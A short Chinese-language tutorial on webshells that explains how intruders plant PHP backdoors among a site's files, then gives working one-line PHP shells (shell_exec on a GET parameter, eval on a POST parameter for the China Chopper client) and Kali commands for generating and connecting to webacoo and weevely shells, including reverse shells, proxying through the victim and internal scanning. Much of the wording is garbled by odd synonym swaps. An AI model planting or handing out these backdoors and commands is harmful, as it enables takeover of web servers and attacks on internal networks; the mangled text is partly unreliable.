webshell就是以网页文件形式存在的一种下令执行环境，也可以将其称做为一种网页后门。黑客在入侵了一个网站后，通常会将php后门文件与网站服务器WEB目录下正常的网页文件混在一起，然后就可以使用浏览器来访问php后门，获得一个下令执行环境，以到达控制网站服务器的目的。 

顾名思义，“web”的寄义是显然需要服务器开放web服务，“shell”的寄义是取得对服务器某种程度上操作权限。webshell经常被称为入侵者通过网站端口对网站服务器的某种程度上操作的权限。由于webshell其大多是以动态剧本的形式泛起，也有人称之为网站的后门工具。

php经典一句话: 

<?php echo shell_exec($_GET[‘cmd‘]);?>

中国菜刀：
官网：www.maicaidao.co
原理：上传一句话(<?php @eval($_POST[‘我是密码‘]);?>)至服务器端，再用中国菜刀客户端(图形化界面)去毗邻服务器

 

webacoo(kali):
特点：传输的数据包裹在cookie中，并非http包体内，起到一定绕过作用
原理：天生webshell，上传至目的服务器，再拿webacoo去毗邻该webshell，返回可以执行系统下令的shell
瑕玷：不能设置专属毗邻密码
天生webshell： webacoo -g -o a.php
毗邻webshell： webacoo -t -u http://192.168.1.1/a.php

 

weevely(kali):
原理：天生webshell，上传至目的服务器，再拿weevely去毗邻该webshell，返回可以执行系统下令的shell
天生webshell：weevely generate 密码 a.php
毗邻webshell：weevely http://192.168.1.1/a.php 密码
特点：毗邻到目的服务器webshell后还可以挪用内置的N多模块，在shell下输入help查看模块，直接在shell下输入模块名称使用模块

30多个治理模块举例：
1、执行系统下令、浏览文件系统
2、检查服务器常见设置错误
3、建立正向、反向TCP Shell毗邻
4、将目的服务器作为署理http服务器(肉鸡) ====>只需要在毗邻到的shell中输入net_proxy即可打开署理，此时会在内陆监听127.0.0.1:8080，浏览器设置为该署理后所有流量将走目的服务器
5、从目的计算机运行端口扫描，渗透内网